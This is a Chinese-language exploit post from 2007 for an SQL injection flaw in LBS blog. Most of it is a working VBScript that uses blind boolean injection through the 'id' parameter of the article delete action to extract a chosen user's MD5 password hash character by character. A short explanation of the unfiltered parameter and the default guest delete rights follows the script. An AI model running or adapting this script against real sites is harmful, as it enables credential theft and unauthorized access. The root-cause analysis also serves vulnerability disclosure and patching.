LBS blog sql注射漏洞[All version]-官方已有補(bǔ)丁

更新時(shí)間：2007年08月26日 21:59:16 作者：

呵呵,只是證明下漏洞存在
exp如下,保存為vbs,自己下個(gè)程序測(cè)試自己吧

'From 劍心
'============================================================================
'使用說(shuō)明：
' 在命令提示符下：
' cscript.exe lbsblog.vbs 要攻擊的網(wǎng)站的博客路徑有效的文章id 要破解的博客用戶密碼
'如：
' cscript.exe lbsblog.vbs www.xxxx.com/blog/ 1 1
' by loveshell
'============================================================================
On Error Resume Next
Dim oArgs
Dim olbsXML 'XMLHTTP對(duì)象用來(lái)打開目標(biāo)網(wǎng)址
Dim TargetURL '目標(biāo)網(wǎng)址
Dim userid,articleid '博客用戶名
Dim TempStr '存放已獲取的部分 MD5密碼
Dim CharHex '定義16進(jìn)制字符
Dim charset

Set oArgs = WScript.arguments
If oArgs.count < 1 Then Call ShowUsage()

Set olbsXML = createObject("Microsoft.XMLHTTP")

'補(bǔ)充完整目標(biāo)網(wǎng)址
TargetURL = oArgs(0)
If LCase(Left(TargetURL,7)) <> "http://" Then TargetURL = "http://" & TargetURL
If right(TargetURL,1) <> "/" Then TargetURL = TargetURL & "/"
TargetURL=TargetURL & "article.asp"

articleid=oArgs(1)
userid=oArgs(2)
TempStr=""
CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")

WScript.echo "LBS blog All version Exploit"&vbcrlf
WScript.echo "By 劍心"&vbcrlf
WScript.echo "http://www.loveshell.net/    Just For fun :)"&vbcrlf&vbcrlf
WScript.echo "+Fuck the site now"&vbcrlf

Call main(TargetURL,BlogName)

Set oBokeXML = Nothing

'----------------------------------------------sub-------------------------------------------------------
'============================================
'函數(shù)名稱：main
'函數(shù)功能：主程序，注入獲得blog 用戶密碼
'============================================
Sub main(TargetURL,BlogName)
Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage
For MainOffset = 1 To 40
For SubOffset = 0 To 15
TempLen = 0
    postdata = ""
    postdata = articleid &" and (select left(user_password,"&MainOffset&") from blog_user where user_id=" & userid & ")='" & TempStr&CharHex(SubOffset) &"'"

    OpenURL = TargetURL

olbsXML.open "Post",OpenURL, False, "", ""
    olbsXML.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
olbsXML.send "act=delete&id="& escape(postdata)
GetPage = BytesToBstr(olbsXML.ResponseBody)
'判斷訪問(wèn)的頁(yè)面是否存在
If InStr(GetPage,"deleted")<>0 Then
'"博客用戶不存在或填寫的資料有誤" 為錯(cuò)誤標(biāo)志，返回此標(biāo)志說(shuō)明猜解的 MD5 不正確
'如果得到 0000000000000000 的 MD5 值，請(qǐng)修改錯(cuò)誤標(biāo)志
ElseIf InStr(GetPage,"permission")<>0 Then
TempStr=TempStr & CharHex(SubOffset)
WScript.Echo "+Crack now："&TempStr
Exit for
Else
WScript.echo vbcrlf & "Something error" & vbcrlf
WScript.echo vbcrlf & GetPage& vbcrlf
WScript.Quit
End If
next
Next
WScript.Echo vbcrlf& "+We Got It：" & TempStr & vbcrlf &vbcrlf&":P Don't Be evil"
End sub

'============================================
'函數(shù)名稱：BytesToBstr
'函數(shù)功能：將XMLHTTP對(duì)象中的內(nèi)容轉(zhuǎn)化為GB2312編碼
'============================================
Function BytesToBstr(body)
dim objstream
set objstream = createObject("ADODB.Stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function

'============================
'函數(shù)名稱：ShowUsage
'函數(shù)功能：使用方法提示
'============================
Sub ShowUsage()
WScript.echo " LBS blog Exploit" & vbcrlf & " By Loveshell/劍心"
WScript.echo "Usage:"& vbcrlf & " CScript " & WScript.ScriptFullName &" TargetURL BlogName"
WScript.echo "Example:"& vbcrlf & " CScript " & WScript.ScriptFullName &" http://www.loveshell.net/ 1 1"
WScript.echo ""
WScript.Quit
End Sub

漏洞說(shuō)明:

src_article.asp中的
......
input["log_id"]=func.checkInt(input["log_id"]);
if(!input["id"]){
strError=lang["invalid_parameter"];
}else{
// Check if the article exists
theArticle.load("log_id, log_authorID, log_catID","log_id="+input["id"]);
strError=false;
}
......

過(guò)濾的是log_id,但是使用的確實(shí)id,呵呵 :)

然后呢?
class/article.asp中的代碼
this.load = function(strselect, strwhere){
var tmpA=connBlog.query("select TOP 1 "+strselect+" FROM [blog_Article] where "+strwhere);
if(tmpA){
this.fill(tmpA[0]);
return true;
}else{
return false;
}
}

上面不用說(shuō)了吧,呵呵.不過(guò)觸發(fā)要條件的,看能滿足不哦!

function articledelete(){
if(theUser.rights["delete"]<1){
// Check User Right - without DB Query
pageHeader(lang["error"]);
redirectMessage(lang["error"], lang["no_rights"], lang["goback"], "javascript:window.history.back();", false, "errorbox");
}else{
var theArticle=new lbsArticle();
var strError;

默認(rèn)情況下guest都有刪除權(quán)限的,盡管后面還做了判斷,但是注入已經(jīng)發(fā)生,而我們正好利用他的判斷注射,呵呵